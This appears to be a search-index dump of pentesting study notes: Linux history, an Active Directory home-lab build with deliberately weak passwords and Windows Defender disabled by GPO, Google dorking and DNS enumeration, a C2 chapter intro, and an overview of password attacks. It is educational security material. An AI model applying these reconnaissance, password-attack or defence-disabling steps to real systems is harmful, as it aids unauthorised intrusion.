[{"content":" Note In 1984 Richard Stallman, an American software engineer, had a goal to create a completely free UNIX-compatible open-source (non-proprietary) operating system. The initiative was called the GNU Project (GNU’s Not Unix) and by 1991. Then Linus Torvalds developed a kernel and proclaimed its availability.\nBasically Linux is not an OS, it\u0026rsquo;s an open-source kernel. Here\u0026rsquo;s a basic timeline that will give a brief idea about the evolution of Linux (major milestones):\n1991: Linus Torvalds announces personal project on Usenet; first Linux kernel release (0.01)\n1992: Relicensed under GPLv2 (open source); first distributions (SLS, MCC Interim Linux)\n1993: Slackware Linux released; Debian Project founded by Ian Murdock\n1994: Linux kernel 1.0 released; Red Hat Commercial Linux founded; S.u.S.E. Linux founded\n1996: Linux kernel 2.0 released (Symmetric Multiprocessing support); Tux the Penguin adopted as mascot\n1998: KDE 1.0 released; major corporations (Oracle, Sun) announce support\n1999: GNOME 1.0 released; Red Hat goes public\n2004: Ubuntu 4.10 (Warty Warthog) released\n2007: Android (built on the Linux kernel) announced\n2011: Linux kernel 3.0 released\n2015: Linux kernel 4.0 released\n2019: Linux kernel 5.0 released\n2022: Linux kernel 6.0 released\nThere are several distros available which use the Linux kernel as their base, and here\u0026rsquo;s a picture I found on the web that demonstrates the evolution of distros pretty well [CURRENTLY THE PROJECT IS NOT MAINTAINED ANYMORE] -\u0026gt; DISTRO-EVOLUTION ","permalink":"https://0x-s0M3n4th.github.io/notes/system_administration/00-chapter-1/00-history-of-linux/","summary":"\u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition 
note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eIn 1984 Richard Stallman, an American software engineer, had a goal to create a completely free UNIX-compatible open-source (non-proprietary) operating system. The initiative was called the GNU Project (GNU’s Not Unix) and by 1991.\nThen Linus Torvalds developed a kernel and proclaimed its availability.\u003c/p\u003e","title":"History of linux"},{"content":"Requirements: Kali linux Vmware workstation pro Windows 10 workstation windows server 2022 Metasploitable Linux 2 Linux mint(optional) You should have basic knowledge of setting up vms inside vmware, plus feel free to omit any machine as your system needs. Vmware workstation pro: Install by signing up from this site VMWARE Kali linux: Install kali linux from this site KALI Linux Note Install prebuilt vm images for vmware\nLinux mint(optional): We will be using this distro for setting up basic blue team operations regarding detection of the attacks. It\u0026rsquo;s an optional setup. If you have limited resources skip this. Install linux mint from this site LINUX MINT, install the xfce edition for lightweight usage. 
Metasploitable-2-linux: Install from this site Metasploitable-2-linux windows 10 enterprise iso: Install from this site Win 10 (link not working), I will provide a drive link later on ;)) You can use any windows workstation for testing!! Windows server 2022 iso: Install from this site WINDOWS SERVER 2022 You can use any windows server for testing. Network segmentation inside vmware: We will be making 5 different folders for our homelab inside vmware. First one, ATTACK-BOX: kali linux will be inside this. Second one, PENTEST-NET: metasploitable-2-linux will be inside this. Third one, PIVOT-NET: the 2 windows 10 workstations (name them THEPUNISHER, SPIDERMAN) will be inside this. Fourth one, SECURE-NET: windows server 2022 will be inside this. Fifth one, DETECTION-NET: our linux mint machine will be inside this. You can make the folders by right clicking on the empty space in vmware -\u0026gt; by selecting the New folder option. Now after making and separating the machines, we need to segment the network. To do so follow the next steps: Open vmware -\u0026gt; click on Edit -\u0026gt; then Virtual Network Editor. You should see two networks: one named NAT, and the other would be your host-only connection. We will add 2 more subnets: click on Change settings -\u0026gt; click on Add network -\u0026gt; select your preferred vmnet and click Add. After adding we need to change some subnet settings in the bottom-left corner. Follow the screenshots to give the same as mine: Important If you don\u0026rsquo;t want to segment the network and make the lab with only the NAT network, you can do so; for a simpler setup use NAT (if inexperienced). 
For this whole Network pentesting guide I am going to use kali on 3 of the vmnets for ease of the audience.\nNow click on Apply. Then come to vmware -\u0026gt; click on kali linux -\u0026gt; edit virtual machine -\u0026gt; add 2 extra network adapters by clicking on the Add button and selecting Network adapter. After that add your kali machine into vmnet2, vmnet3 (according to my subnet naming). Then come to your Linux mint machine and do the same as kali. Add your metasploitable 2 linux machine into vmnet2 only. For the NAT only setup you will add metasploitable 2 in NAT. Network segmentation summary: All devices in NAT: Just normal default importing of all the vms in vmware. Kali is on NAT, vmnet2 and vmnet3, with linux mint used as a router for pivoting through machines inside the network segment so that all of the workstations under the forest can talk to each other: Later on for advanced level pivoting I will show how we can make the following type of network, where kali will be only on NAT with some added changes: Feel free to use any of the architectures, but I would suggest you make the first one for easy setup and rapid exploitation without network failures, plus fewer resources consumed. If you want to actually feel more of a real world scenario use the second one.\nNote I will be using the second one for this whole Network pentesting tutorial. For some practicals I have added new vulnerable machines which I will be providing later on throughout the course. Sometimes I have also used a different Domain controller like windows server 2019 for demo purposes; you can do all these works inside your own DC which we will be setting up.\nActive Directory LAB setup: We will first set up the Domain controller. Setting up the Domain controller: Come to your windows server 2022 -\u0026gt; Add it into vmnet3 along with NAT in case of internet related tasks like installations. 
Boot your windows server -\u0026gt; make sure you are at this stage: Click on Next -\u0026gt; Install Now. You should see a page like this: Click on Windows Server 2022 Standard Evaluation (Desktop Experience) -\u0026gt; then hit Next. Check the box -\u0026gt; hit Next. Once you are at this page: Click on Custom install. Then on this page hit New -\u0026gt; Apply. Hit OK on the warning. Click Next again on this page: Now let it install. After that you will come to this page: Give the password P@$$w0rd! Now login using the creds. Install vmware tools -\u0026gt; click VM -\u0026gt; Install VMware Tools -\u0026gt; open cmd -\u0026gt; run the command D:\\setup.exe -\u0026gt; After completing the VMware Tools installation using the wizard that pops up -\u0026gt; restart. Now we need to rename our windows server -\u0026gt; press on the windows button -\u0026gt; type name -\u0026gt; Then click on this option: After that click on Rename PC. We will be building this Lab as a MARVEL theme, so I gave the name HYDRA-DC -\u0026gt; then restart again. Login again. Now we will actually start setting up our windows server as Domain controller. On server manager -\u0026gt; Click on the Manage button -\u0026gt; Click Add roles and features. A wizard will pop up, click Next 3 times. On selection of Server Roles, select Active Directory Domain Services. This will allow us to have our domain. Hit Add features on the next pop up. Then click Next 3 times again on the options given. After coming to this page check this option: Then hit Install. After installation click on this option: A new wizard will pop up, click on these options, and give this domain name {you can give your unique domain name, but make sure you have added .local at the end of the name}: Hit Next -\u0026gt; Give the same admin password into this page also: Hit Next 2 times including the previous step. Populated the NetBIOS domain name successfully: Hit Next again. 
Our pathways: What is SYSVOL: SYSVOL is a shared folder on each domain controller (DC) in a Windows Server Active Directory (AD) domain that stores critical files for common access and replication across the domain. It contains a copy of Group Policy Objects (GPOs) and scripts, such as logon and startup scripts, which are essential for applying policies to member computers.\nWhat is NTDS: NTDS, or NT Directory Services, is the underlying technology and database that powers Microsoft\u0026rsquo;s Active Directory (AD). It is responsible for storing and managing all the information about network resources, such as user accounts, computer objects, groups, and security identifiers (SIDs). The physical database file is named ntds.dit (Directory Information Tree) and is stored by default in the %SystemRoot%\\NTDS folder on every domain controller.\nHit Next again 2 times including this pathways page. You should see a prerequisite check running, and after some time it should say successful -\u0026gt; then hit Install. Then on installation it should give a pop up like this -\u0026gt; click Close. Your DC will be automatically restarted and bring you to the login screen. Login. We will now install another feature called ADCS (Active Directory Certificate Services); this allows us to use LDAPS on our DC, and manages certificates for authentication purposes. Again on server manager -\u0026gt; click Manage -\u0026gt; Add roles and features -\u0026gt; Next 3 times -\u0026gt; Select ADCS -\u0026gt; Add features -\u0026gt; Next 4 times -\u0026gt; Check the restart box -\u0026gt; hit Install. Then after installation -\u0026gt; click on this option: Hit Next on the first option. Check the box of Certificate Authority and hit Next. Hit Next 5 times again -\u0026gt; change the validity option to 99 years. Hit Next and come to this page then click Configure. Restart again after the completion. 
Setting up the windows 10 machines: Boot up both the windows 10 machines now. I removed the previous machines containing the windows 10 enterprise iso; this time I am having the normal windows 10 iso, so we will be using windows 10 education. Remember while adding the vm you gave a username and password; in my case only then did the following pages come up. Then set up the basic requirements on both the machines. Use the option domain joined instead, rather than using online accounts. 4. Name THEPUNISHER vm\u0026rsquo;s user as frankcastle with password Password1, and SPIDERMAN vm\u0026rsquo;s user as peterparker with password Password1 5. Select the security questions and answer them as bob for every single one of them in both the machines. 6. Turn off all the privacy settings, we don\u0026rsquo;t want to send any data to Microsoft 7. Don\u0026rsquo;t accept Cortana 8. After doing the complete setup, it will automatically boot up the machines, then rename these two machines as THEPUNISHER, SPIDERMAN respectively. Then restart again. Setting up GPO (Groups, Policies and Users): Open up the Domain controller\nOn server manager -\u0026gt; Click on Tools -\u0026gt; Active Directory Users and Computers\nThis page should load up: Separating the groups from users: Give the name as Groups\nGrab all the groups from the Users tab and move them to Groups except the Administrator and Guest users. Making Domain admin:\nRight click on the Administrator user -\u0026gt; Copy -\u0026gt; Fill the following information. Give the password as: Password12345! 
Click Next and hit Finish. Making a service account which will be another Domain admin:\nAgain copy from the Administrator account and use the following info: Give the password as MYpassword123# Then do this step: Making some low level users which will be part of our Domain users group:\nUse the following steps to open the wizard: Add the frank castle user: Use the following checkboxes, and give the same password of frankcastle which is Password1 Add peterparker using the following steps: We will give here his password as Password2 All users: SETTING UP FILESHARE:\nCome to server manager -\u0026gt; Click on Files and storage services. Click on Shares -\u0026gt; Tasks -\u0026gt; New share -\u0026gt; SMB share quick -\u0026gt; click Next -\u0026gt; Click Next again -\u0026gt; give the share name as hackme -\u0026gt; click Next 2 times -\u0026gt; hit Create\nSetting up the service account (SQL Service):\nOpen command prompt as administrator and use the following command:\nsetspn -a HYDRA-DC/SQLService.MARVEL.local:60111 MARVEL\\SQLService\n3. Verify the changes using the following command by querying:\nsetspn -T MARVEL.local -Q */*\nAt the end of the command\u0026rsquo;s output we should see this result: Setting up a group policy:\nOn the start menu type group. Use the following options to create a new GPO: Give this name: Our motive is to disable windows defender across the whole domain, as we are not going to perform any modern defender evasion techniques. 
Use the following steps for editing the GPO: Come to this column: Find Microsoft Defender Antivirus -\u0026gt; and double click on this turn off option: A wizard should pop up -\u0026gt; click on Enabled -\u0026gt; Apply -\u0026gt; click OK. Then again come back to the GPO management tab -\u0026gt; right click -\u0026gt; click Enforced. Then give the DC a static IP from the adapter settings; I used linux mint as the DNS server: I have used linux mint as the gateway; if you are not using any intermediate OS acting as a router, don\u0026rsquo;t give any gateway (as no default gateway exists inside vmnet\u0026rsquo;s host-only networks, in case you are using the network segmentation). If you are using the NAT only setup give your NAT's default gateway. You can identify your NAT's default gateway through Virtual Network Editor -\u0026gt; Change settings -\u0026gt; select the NAT network -\u0026gt; NAT settings.\nNote Don\u0026rsquo;t get fooled by my lab result\u0026rsquo;s IP addresses. Your lab will be having a different setup of IPs as well as NICs. 
Understand those carefully and then add accordingly throughout the lab setup as well as on practical demos.\nSetting up Linux mint as an intermediate router (optional): For the advanced lab setup\nSet up static IPs for both Wired connection 2 and 3 in linux mint: ENABLING IP FORWARDING:\n# Turn on forwarding immediately\nsudo sysctl -w net.ipv4.ip_forward=1\n# Make it permanent (so it survives a reboot)\necho \u0026#34;net.ipv4.ip_forward=1\u0026#34; | sudo tee -a /etc/sysctl.conf\nFIXING THE FIREWALL BY ALLOWING ROUTING: Allow traffic from vmnet2 to go to vmnet3:\nsudo ufw route allow in on ens34 out on ens35\nAllow traffic from vmnet3 to go to vmnet2:\nsudo ufw route allow in on ens35 out on ens34\nJoining the Machines to the Domain controller: Pointing those machines to our Domain controller: If you have followed the linux mint one this one is for you: Our motive is to point SPIDERMAN to route its traffic through linux mint to the Domain controller and vice versa. To do so use the following settings in your vmnet 2 adapter on SPIDERMAN: On the THEPUNISHER machine use the following settings for vmnet 2: Settings for vmnet 3 on THEPUNISHER machine: If you are doing the NAT only setup: Give the default gateway of your NAT network for both of the machines. Give the Domain controller's IP as DNS for both the machines. Testing the connections: Ping SPIDERMAN to Linux mint, then SPIDERMAN to THEPUNISHER. Ping THEPUNISHER to linux mint and then to SPIDERMAN. Ping the Domain controller from both the SPIDERMAN and THEPUNISHER machines and vice versa. If you face a request timeout issue, turn off windows firewall fully on both the PUNISHER and SPIDERMAN machines. Then try again. 
Joining the domain from THEPUNISHER machine: Click on the start button -\u0026gt; type Domain and access this option: Click on Connect -\u0026gt; and click on Join this device to a local AD domain. Give your local domain name and hit Next: If this window loads up, that means your lab setup is successful: Give username as administrator and password as P@$$w0rd! Then on this pop up, select account type as Administrator. Joining domain for SPIDERMAN machine: Do the exact same stuff we did for THEPUNISHER machine. Let those machines reboot, come to the DC -\u0026gt; server manager -\u0026gt; Active Directory Users and Computers -\u0026gt; Under your local domain -\u0026gt; select Computers. You should see your two Windows 10 workstations. Now login onto both the workstations as MARVEL\\administrator using the DC's admin password which is P@$$w0rd! Now adding local admins inside THEPUNISHER machine: click on the start button -\u0026gt; type users and go to the settings Edit local groups and users: or you can press win + r and type lusrmgr.msc. Come to the Users tab -\u0026gt; right click on Administrator -\u0026gt; then set a password -\u0026gt; give this password Password1! 
Enable this account by double clicking it -\u0026gt; and unchecking the checkbox Account is disabled. Adding fcastle, which we made inside the DC, into THEPUNISHER machine\u0026rsquo;s Administrators group: Click on Add -\u0026gt; type fcastle -\u0026gt; click on Check Names and this should appear: Hit Apply and OK. Then enable Network discovery by going into the Network folder. Adding local admins inside SPIDERMAN machine: Do the same steps as THEPUNISHER's step number 4. Then add 2 accounts into the Administrators group using the following steps: Write pparker and click Check Names; add fcastle the same way we did it inside THEPUNISHER. Now peterparker and frankcastle are both local admins inside the SPIDERMAN machine. Enable network sharing by clicking the option Click to change -\u0026gt; turn on network discovery and file sharing. Restart your computer and login as peterparker like this: Now we will map the network drive. Follow these steps: Type \\\\HYDRA-DC\\hackme and check both the boxes: Use the domain admin credentials administrator and P@$$w0rd! Now we should access the shared drive: CONGRATS WE HAVE COMPLETED THE LAB SETUP !! 
Let\u0026rsquo;s start hacking.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/01-lab-build/01-easy-to-setup-lab/","summary":"\u003ch2 id=\"requirements\"\u003eRequirements:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eKali linux\u003c/li\u003e\n\u003cli\u003eVmware workstation pro\u003c/li\u003e\n\u003cli\u003eWindows 10 workstation\u003c/li\u003e\n\u003cli\u003ewindows server 2022\u003c/li\u003e\n\u003cli\u003eMetasploitable Linux 2\u003c/li\u003e\n\u003cli\u003eLinux mint(optional)\n\u003cem\u003eYou should have basic knowledge of setting up vms inside vmware, plus feel free to omit any machine as your system needs.\u003c/em\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch3 id=\"vmware-workstation-pro\"\u003eVmware workstation pro:\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eInstall by signing up from this site \u003ca href=\"https://www.vmware.com/products/desktop-hypervisor/workstation-and-fusion\"\u003eVMWARE\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch3 id=\"kali-linux\"\u003eKali linux:\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eInstall kali linux from this site \u003ca href=\"https://kali.org\"\u003eKALI Linux\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 
29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eInstall prebuilt vm images for vmware\u003c/p\u003e","title":"Easy home lab setup guide"},{"content":" site:microsoft.com -\u0026gt; To view only results that come from the target domain name. Imagine that you are looking for search results that contain a keyword but only from the target domain. Here, you can use the keyword site:domain.com syntax. If you want to filter your search results so that they include two specific keywords, you can use the keyword1 AND keyword2 site:domain.com syntax. We can also use the OR syntax. To filter the search results to display a specific file type from a target domain, use the site:domain.com filetype:type syntax. To discover specific URLs that contain a specific keyword within their page title, use the site:domain.com intitle:keyword syntax. To remove from the results the URLs for a target domain so that they do not include a specific keyword, use the site:domain.com -keyword syntax. Tip You can use the intext: syntax with a keyword to search for a specific web page that contains the keyword within its text/body. Using inurl: with a keyword allows you to filter URLs that contain the specific keywords within their URL, which may lead to a potentially sensitive directory in a company\u0026rsquo;s domain.\nWe can also head over to the home page of google by typing google.com; on the lower right corner click on Settings \u0026gt; Advanced search. After filling in the necessary details and clicking on the Advanced search button, google will automatically search for you. While there are so many possibilities when using Google search operators, it can be a bit overwhelming. 
Google Hacking Database (GHDB) is maintained by the creators of Kali Linux, Offensive Security (https://www.offensive-security.com), and can be found at https://www.exploit-db.com/google-hacking-database. This website contains a list of various Google dorks (search operators), which are used to find very sensitive information on the internet using Google Search. DNS reconnaissance: A DNS server is like a traditional telephone directory, with a list of people and their telephone numbers. On a DNS server, you can find records of hostnames, as well as their associated IP addresses, which are similar to telephone numbers. There are many public DNS servers on the internet; some are created by threat actors with malicious intentions, such as redirecting unaware users to malicious websites. As a result, I recommend using a trusted DNS provider on all of your networking devices and computers to improve your online safety. The following are some popular DNS servers on the internet: • Cloudflare DNS: https://1.1.1.1/ • Quad9 DNS: https://www.quad9.net/ • Cisco OpenDNS: https://www.opendns.com/ • Google Public DNS: https://developers.google.com/speed/public-dns\nDNS record types: • A: Resolves a hostname to an IPv4 address.\n• AAAA: Resolves a hostname to an IPv6 address.\n• NS: Contains the name servers\u0026rsquo; information.\n• MX: Contains the mail exchange (email) servers.\n• PTR: Resolves an IP address to a hostname.\n• CNAME: Provides a canonical name or an alias.\n• RP: Specifies the person that\u0026rsquo;s responsible for the domain.\n• SOA: Contains information about the administrator of the domain.\n• SRV: Contains a service port number for a specific service of the domain.\nFor an aspiring penetration tester, DNS enumeration is the technique of probing specific DNS records for a specific organization\u0026rsquo;s domain. In other words, you ask a DNS server about the IP addresses and server names for a target organization. 
Simply put, you can retrieve both the hostname and the IP addresses of a target\u0026rsquo;s public servers, such as their email servers. We can also perform a DNS zone transfer to see misconfigurations on the DNS server or whether it leaks sensitive information.\nDNS enumeration: dnsrecon\ndnsrecon -d microsoft.com\nThe -d option takes the domain name. DNS zone transfer misconfigurations using zonetransfer.me Dnsenum: OSINT automation: Spiderfoot is a very popular OSINT tool that can help penetration testers automate their processes and workloads when gathering intelligence about their targets. This tool provides excellent visualization of all the data it has gathered in the form of graphs and tables, which helps you easily read and interpret the data that\u0026rsquo;s been collected.\nUsing spiderfoot:\nIdentify your IP address. Then run this command:\nsudo spiderfoot -l your_ip:80\nIf any service is already running on port 80 on your system, just change the port number in the spiderfoot command to one of your choice. Now click on the Settings button. Spiderfoot can gather information from a wide range of online sources. However, some of these sources will require an Application Programming Interface (API) key to allow Spiderfoot to perform queries on some sources. The sources that require an API key are indicated with a lock icon next to their names. Keep in mind that Spiderfoot works better when the API keys have been configured within its Settings menu. Many of these OSINT sources provide an API key if you register for a free account on their website. Do take the time to register on a couple of these online sources/websites and simply insert your unique API key into the Spiderfoot Settings menu. Now let\u0026rsquo;s start scanning, follow the options -\u0026gt; New scan -\u0026gt; give name and target and then select Footprint -\u0026gt; Run scan now. Now as the scan is running click on Graph. This will show all the connections. 
Next, to view the data that was collected based on categories, click on Browse. Click on any data. RAW DNS records: Browse -\u0026gt; Raw dns records ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/00-google-dorking--dns-enumeration/","summary":"\u003col\u003e\n\u003cli\u003e\u003ccode\u003esite:microsoft.com\u003c/code\u003e -\u0026gt; To view only results that come from the target domain name.\u003c/li\u003e\n\u003cli\u003eImagine that you are looking for search results that contain a keyword but only from the target domain. Here, you can use the \u003ccode\u003ekeyword site:domain.com\u003c/code\u003e syntax\n\u003cimg alt=\"dns_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003eIf you want to filter your search results so that they include two specific keywords, you can use the \u003ccode\u003ekeyword1 AND keyword2 site:domain.com\u003c/code\u003e syntax\n\u003cimg alt=\"dns_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eWe can also use the \u003ccode\u003eOR\u003c/code\u003e syntax.\u003c/li\u003e\n\u003cli\u003eTo filter the search results to display a specific file type from a target domain, use the \u003ccode\u003esite:domain.com filetype:type\u003c/code\u003e syntax\n\u003cimg alt=\"dns_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003eTo discover specific URLs that contain a specific keyword within their page title, use the \u003ccode\u003esite:domain.com intitle:keyword\u003c/code\u003e syntax\n\u003cimg alt=\"dns_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_4.png\"\u003e\u003c/li\u003e\n\u003cli\u003eTo remove from the results the URLs for a target domain so that they do not include a specific keyword, use the \u003ccode\u003esite:domain.com -keyword\u003c/code\u003e syntax\n\u003cimg alt=\"dns_5\" 
loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_5.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition tip\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 384 512\"\u003e\u003cpath d=\"M272 384c9.6-31.9 29.5-59.1 49.2-86.2c0 0 0 0 0 0c5.2-7.1 10.4-14.2 15.4-21.4c19.8-28.5 31.4-63 31.4-100.3C368 78.8 289.2 0 192 0S16 78.8 16 176c0 37.3 11.6 71.9 31.4 100.3c5 7.2 10.2 14.3 15.4 21.4c0 0 0 0 0 0c19.8 27.1 39.7 54.4 49.2 86.2l160 0zM192 512c44.2 0 80-35.8 80-80l0-16-160 0 0 16c0 44.2 35.8 80 80 80zM112 176c0 8.8-7.2 16-16 16s-16-7.2-16-16c0-61.9 50.1-112 112-112c8.8 0 16 7.2 16 16s-7.2 16-16 16c-44.2 0-80 35.8-80 80z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eTip\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eYou can use the intext: syntax with a keyword to search for a specific web page that contains the keyword within its text/body. Using inurl: with a keyword allows you to filter URLs that contain the specific keywords within its URL, which may lead to a potentially sensitive directory in a company\u0026rsquo;s domain.\u003c/p\u003e","title":"Google Dorking \u0026 DNS Enumeration"},{"content":"This chapter focuses on the Command and Control (C2) stage of the Cyber Kill Chain, which then leads to the threat actor completing the Actions on Objective phase of the cyber-attack. As an aspiring penetration tester, it is essential to understand the fundamentals of performing C2 operations from a threat actor’s perspective. 
This technique also helps penetration testers determine whether their clients’ security solutions are sufficient to detect a real-world cyber-attack and stop a threat actor’s C2 operation.\nIn this section we are going to cover the following topics:\nUnderstanding C2\nSetting up C2 operations\nPost-exploitation using Empire\nWorking with Starkiller. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/09-command-and-control-tactics/00-intro/","summary":"\u003cp\u003eThis chapter focuses on the \u003ccode\u003eCommand and Control (C2)\u003c/code\u003e stage of the \u003ccode\u003eCyber Kill Chain\u003c/code\u003e, which then leads to the threat actor completing the Actions on Objective phase of the cyber-attack. As an aspiring penetration tester, it is essential to understand the fundamentals of performing C2 operations from a threat actor’s perspective. This technique also helps penetration testers determine whether their clients’ security solutions are sufficient to detect a real-world cyber-attack and stop a threat actor’s C2 operation.\u003c/p\u003e","title":"Introduction to Command and Control"},{"content":" In this chapter, we will cover the following topics: • Exploring password-based attacks • Performing host discovery • Identifying and exploiting vulnerable services Password-based attacks: OBJECTIVES:\nGaining unauthorized access to remote hosts on a network by performing attacks against its authentication system Retrieving the password associated with cryptographic hashes Retrieving the password to access a password-protected sensitive file Different types of password attacks: Brute-force attack: In a brute-force attack, every possible combination is tried against the system. This is a very time-consuming process as every possible password combination is tested against the authentication system of the target until the valid password is retrieved. 
While this method may seem to be the best method, the time constraints given for completing a penetration test are often not achievable. Dictionary attack: In a dictionary attack, the threat actor uses a pre-populated wordlist that contains thousands or even millions of candidate passwords. These are tested against the authentication system of the target. Each word from the wordlist is tested; however, the attack will not be successful if a valid password is not found within the wordlist being used by the threat actor. Password guessing: This is a common technique that’s used by many people, even threat actors and penetration testers, who are attempting to gain unauthorized access to a system. I have often seen IT professionals use simple and even default passwords on their networking devices, security appliances, and even the client and server systems within their organization. For instance, by performing a Google dork using common default passwords, you will easily find default passwords for various systems. These default passwords are set by the manufacturer of the device. Password cracking: In this technique, the threat actor uses various tools and techniques to retrieve valid user credentials to gain unauthorized access to a system. Sometimes, a threat actor may capture a user’s password in transit across a network in plaintext by an unsecure network protocol, or even retrieve the cryptographic hash of a password. Password spraying: This is the technique where a threat actor uses a single password and tests it against an authentication system with different usernames. The password is a guessable password, obtained from data breaches or a wordlist. The idea is to test which user account within a specific list uses the same password. This technique is good when testing which users Credential stuffing: This technique allows a threat actor to use a common wordlist of usernames and passwords against the authentication system of a target host. 
This technique checks which combination of usernames and passwords leads to valid user credentials. Online password attack: In an online password attack, the threat actor attempts to gain unauthorized access to a host that is running a network service or a remote access service. This allows authorized users to log in to the system across a network. A simple example of an online password attack is a threat actor attempting to retrieve the username and password of a valid user to gain access to a server that is running the Remote Desktop Protocol (RDP). Keep in mind that online password attacks focus on using a combination of passwords from a wordlist directly on a web login page or network service interface until the correct one is found. Offline password attack: In an offline password attack, the threat actor uses various tools and techniques to retrieve the valid password of a password-protected file, such as a document, or even the cryptographic hash of a user’s password. A simple example of this is capturing a domain administrator’s username and password hash from network packets. The username is usually in plaintext but you may need/want to retrieve the password from the hash value. Important SecLists is a collection of pre-built wordlists containing passwords and usernames that are commonly used by penetration testers to perform both online and offline dictionary attacks. Furthermore, SecLists contains URLs, sensitive data patterns, and fuzzing payloads, which are valuable to penetration testers. You can find the SecLists collections at https://github.com/danielmiessler/SecLists. 
Additionally, you can use the wordlists command within Kali Linux to view the local wordlist repository that is already pre-loaded within the operating system.\nCreating a keyword-based wordlist: Sometimes, web developers and IT professionals set passwords within their organizations and online web applications that are somewhat related to the organization’s goals, mission, products, and services. Custom Wordlist Generator (CeWL) is a password generator tool that enables penetration testers to perform web crawling (spidering) of a website and gather keywords to create a custom wordlist to perform dictionary-based password attacks against a system or file. Let\u0026rsquo;s create a custom wordlist: cewl example.com -m 6 -w output_wordlist.txt This command will generate a custom wordlist containing words with a minimum length of 6 characters using keywords from the website example.com. It will then output the results in the output_wordlist.txt file.\nGenerating a custom wordlist using crunch: Crunch is an offline password generator that enables penetration testers to create custom wordlists to perform dictionary-based password attacks. 
